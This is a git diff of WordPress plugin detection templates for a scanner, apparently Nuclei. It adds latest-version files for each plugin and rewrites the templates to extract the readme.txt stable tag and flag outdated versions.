a/technologies/wordpress/wordpress-instagram-feed.yaml b/technologies/wordpress/wordpress-instagram-feed.yaml index f324036306..2fa523b4a6 100644 --- a/technologies/wordpress/wordpress-instagram-feed.yaml +++ b/technologies/wordpress/wordpress-instagram-feed.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-instagram-feed.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.txt b/technologies/wordpress/wordpress-intuitive-custom-post-order.txt new file mode 100644 index 0000000000..711ee4f504 --- /dev/null +++ b/technologies/wordpress/wordpress-intuitive-custom-post-order.txt @@ -0,0 +1 @@ +3.1.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml index 5a75206465..e3d6ef65d5 100644 --- a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml +++ b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-intuitive-custom-post-order.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-iwp-client.txt b/technologies/wordpress/wordpress-iwp-client.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-iwp-client.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-iwp-client.yaml b/technologies/wordpress/wordpress-iwp-client.yaml index b43205cce1..c0a6180267 100644 --- a/technologies/wordpress/wordpress-iwp-client.yaml +++ b/technologies/wordpress/wordpress-iwp-client.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-iwp-client.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-jetpack.txt b/technologies/wordpress/wordpress-jetpack.txt new file mode 100644 index 0000000000..801a96cb78 --- /dev/null +++ b/technologies/wordpress/wordpress-jetpack.txt @@ -0,0 +1 @@ +11.5.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-jetpack.yaml b/technologies/wordpress/wordpress-jetpack.yaml index 086b91183b..f4fcffaf2b 100644 --- a/technologies/wordpress/wordpress-jetpack.yaml +++ b/technologies/wordpress/wordpress-jetpack.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-jetpack.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-kadence-blocks.txt b/technologies/wordpress/wordpress-kadence-blocks.txt new file mode 100644 index 0000000000..7652d3742b --- /dev/null +++ b/technologies/wordpress/wordpress-kadence-blocks.txt @@ -0,0 +1 @@ +2.4.22 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-kadence-blocks.yaml b/technologies/wordpress/wordpress-kadence-blocks.yaml index 1211ba73e5..0235308e48 100644 --- a/technologies/wordpress/wordpress-kadence-blocks.yaml +++ b/technologies/wordpress/wordpress-kadence-blocks.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-kadence-blocks.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-kirki.txt b/technologies/wordpress/wordpress-kirki.txt new file mode 100644 index 0000000000..497b98347e --- /dev/null +++ b/technologies/wordpress/wordpress-kirki.txt @@ -0,0 +1 @@ +4.0.24 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-kirki.yaml b/technologies/wordpress/wordpress-kirki.yaml index 15a9394eea..4e28a92443 100644 --- a/technologies/wordpress/wordpress-kirki.yaml +++ b/technologies/wordpress/wordpress-kirki.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-kirki.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-leadin.txt b/technologies/wordpress/wordpress-leadin.txt new file mode 100644 index 0000000000..7acf60a455 --- /dev/null +++ b/technologies/wordpress/wordpress-leadin.txt @@ -0,0 +1 @@ +9.2.12 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-leadin.yaml b/technologies/wordpress/wordpress-leadin.yaml index 5e09970304..034fdd9218 100644 --- a/technologies/wordpress/wordpress-leadin.yaml +++ b/technologies/wordpress/wordpress-leadin.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-leadin.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt new file mode 100644 index 0000000000..dea5277965 --- /dev/null +++ b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt @@ -0,0 +1 @@ +2.25.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml index f2d68108da..8e6cf71dd5 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml +++ b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-limit-login-attempts-reloaded.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-limit-login-attempts.txt b/technologies/wordpress/wordpress-limit-login-attempts.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-limit-login-attempts.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-limit-login-attempts.yaml b/technologies/wordpress/wordpress-limit-login-attempts.yaml index c541c2e171..1edf58af97 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts.yaml +++ b/technologies/wordpress/wordpress-limit-login-attempts.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-limit-login-attempts.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-litespeed-cache.txt b/technologies/wordpress/wordpress-litespeed-cache.txt new file mode 100644 index 0000000000..11aa145248 --- /dev/null +++ b/technologies/wordpress/wordpress-litespeed-cache.txt @@ -0,0 +1 @@ +5.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-litespeed-cache.yaml b/technologies/wordpress/wordpress-litespeed-cache.yaml index 80d3a6243a..3a85119635 100644 --- a/technologies/wordpress/wordpress-litespeed-cache.yaml +++ b/technologies/wordpress/wordpress-litespeed-cache.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-litespeed-cache.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-loco-translate.txt b/technologies/wordpress/wordpress-loco-translate.txt new file mode 100644 index 0000000000..bd4053bfb1 --- /dev/null +++ b/technologies/wordpress/wordpress-loco-translate.txt @@ -0,0 +1 @@ +2.6.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-loco-translate.yaml b/technologies/wordpress/wordpress-loco-translate.yaml index 8a859df5f3..b44fd34923 100644 --- a/technologies/wordpress/wordpress-loco-translate.yaml +++ b/technologies/wordpress/wordpress-loco-translate.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-loco-translate.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-loginizer.txt b/technologies/wordpress/wordpress-loginizer.txt new file mode 100644 index 0000000000..d263485165 --- /dev/null +++ b/technologies/wordpress/wordpress-loginizer.txt @@ -0,0 +1 @@ +1.7.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-loginizer.yaml b/technologies/wordpress/wordpress-loginizer.yaml index 18966ecfa7..8a75e7a194 100644 --- a/technologies/wordpress/wordpress-loginizer.yaml +++ b/technologies/wordpress/wordpress-loginizer.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-loginizer.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-loginpress.txt b/technologies/wordpress/wordpress-loginpress.txt new file mode 100644 index 0000000000..f5d2a58582 --- /dev/null +++ b/technologies/wordpress/wordpress-loginpress.txt @@ -0,0 +1 @@ +1.6.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-loginpress.yaml b/technologies/wordpress/wordpress-loginpress.yaml index a9a1c19174..2b0c8138e6 100644 --- a/technologies/wordpress/wordpress-loginpress.yaml +++ b/technologies/wordpress/wordpress-loginpress.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/loginpress/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-loginpress.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml index 2de54c8935..0f13fa172f 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml +++ b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-mailchimp-for-woocommerce.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mailchimp-for-wp.txt b/technologies/wordpress/wordpress-mailchimp-for-wp.txt new file mode 100644 index 0000000000..d276af03a0 --- /dev/null +++ b/technologies/wordpress/wordpress-mailchimp-for-wp.txt @@ -0,0 +1 @@ +4.8.12 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml b/technologies/wordpress/wordpress-mailchimp-for-wp.yaml index f2f90f07ba..a802c96145 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml +++ b/technologies/wordpress/wordpress-mailchimp-for-wp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-mailchimp-for-wp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mailpoet.txt b/technologies/wordpress/wordpress-mailpoet.txt new file mode 100644 index 0000000000..99eba4de93 --- /dev/null +++ b/technologies/wordpress/wordpress-mailpoet.txt @@ -0,0 +1 @@ +4.1.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-mailpoet.yaml b/technologies/wordpress/wordpress-mailpoet.yaml index 7ffecb1125..e1752359ee 100644 --- a/technologies/wordpress/wordpress-mailpoet.yaml +++ b/technologies/wordpress/wordpress-mailpoet.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-mailpoet.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-maintenance.txt b/technologies/wordpress/wordpress-maintenance.txt new file mode 100644 index 0000000000..109b44a452 --- /dev/null +++ b/technologies/wordpress/wordpress-maintenance.txt @@ -0,0 +1 @@ +4.07 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-maintenance.yaml b/technologies/wordpress/wordpress-maintenance.yaml index 73b1d0cd08..461392faf2 100644 --- a/technologies/wordpress/wordpress-maintenance.yaml +++ b/technologies/wordpress/wordpress-maintenance.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-maintenance.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mainwp-child.txt b/technologies/wordpress/wordpress-mainwp-child.txt new file mode 100644 index 0000000000..fbdd614c23 --- /dev/null +++ b/technologies/wordpress/wordpress-mainwp-child.txt @@ -0,0 +1 @@ +4.3.0.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-mainwp-child.yaml b/technologies/wordpress/wordpress-mainwp-child.yaml index 063222962e..48f63e948b 100644 --- a/technologies/wordpress/wordpress-mainwp-child.yaml +++ b/technologies/wordpress/wordpress-mainwp-child.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-mainwp-child.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-malcare-security.txt b/technologies/wordpress/wordpress-malcare-security.txt new file mode 100644 index 0000000000..80572fce6e --- /dev/null +++ b/technologies/wordpress/wordpress-malcare-security.txt @@ -0,0 +1 @@ +4.84 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-malcare-security.yaml b/technologies/wordpress/wordpress-malcare-security.yaml index 6d1945b196..88a3dfcc6e 100644 --- a/technologies/wordpress/wordpress-malcare-security.yaml +++ b/technologies/wordpress/wordpress-malcare-security.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-malcare-security.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-megamenu.txt b/technologies/wordpress/wordpress-megamenu.txt new file mode 100644 index 0000000000..f398a20612 --- /dev/null +++ b/technologies/wordpress/wordpress-megamenu.txt @@ -0,0 +1 @@ +3.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-megamenu.yaml b/technologies/wordpress/wordpress-megamenu.yaml index 1f244c433a..c5bcb88555 100644 --- a/technologies/wordpress/wordpress-megamenu.yaml +++ b/technologies/wordpress/wordpress-megamenu.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-megamenu.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-members.txt b/technologies/wordpress/wordpress-members.txt new file mode 100644 index 0000000000..acf9bf09db --- /dev/null +++ b/technologies/wordpress/wordpress-members.txt @@ -0,0 +1 @@ +3.2.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-members.yaml b/technologies/wordpress/wordpress-members.yaml index 4b49697d1b..e03f0c27b2 100644 --- a/technologies/wordpress/wordpress-members.yaml +++ b/technologies/wordpress/wordpress-members.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-members.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-meta-box.txt b/technologies/wordpress/wordpress-meta-box.txt new file mode 100644 index 0000000000..92989cf398 --- /dev/null +++ b/technologies/wordpress/wordpress-meta-box.txt @@ -0,0 +1 @@ +5.6.11 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-meta-box.yaml b/technologies/wordpress/wordpress-meta-box.yaml index 77de3c9e24..a57abbca8e 100644 --- a/technologies/wordpress/wordpress-meta-box.yaml +++ b/technologies/wordpress/wordpress-meta-box.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-meta-box.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ml-slider.txt b/technologies/wordpress/wordpress-ml-slider.txt new file mode 100644 index 0000000000..0f414fd3e1 --- /dev/null +++ b/technologies/wordpress/wordpress-ml-slider.txt @@ -0,0 +1 @@ +3.28.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ml-slider.yaml b/technologies/wordpress/wordpress-ml-slider.yaml index e433198f91..081128a963 100644 --- a/technologies/wordpress/wordpress-ml-slider.yaml +++ b/technologies/wordpress/wordpress-ml-slider.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ml-slider.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-newsletter.txt b/technologies/wordpress/wordpress-newsletter.txt new file mode 100644 index 0000000000..7086d6329b --- /dev/null +++ b/technologies/wordpress/wordpress-newsletter.txt @@ -0,0 +1 @@ +7.5.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-newsletter.yaml b/technologies/wordpress/wordpress-newsletter.yaml index f72effff19..e1eba4979e 100644 --- a/technologies/wordpress/wordpress-newsletter.yaml +++ b/technologies/wordpress/wordpress-newsletter.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-newsletter.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - 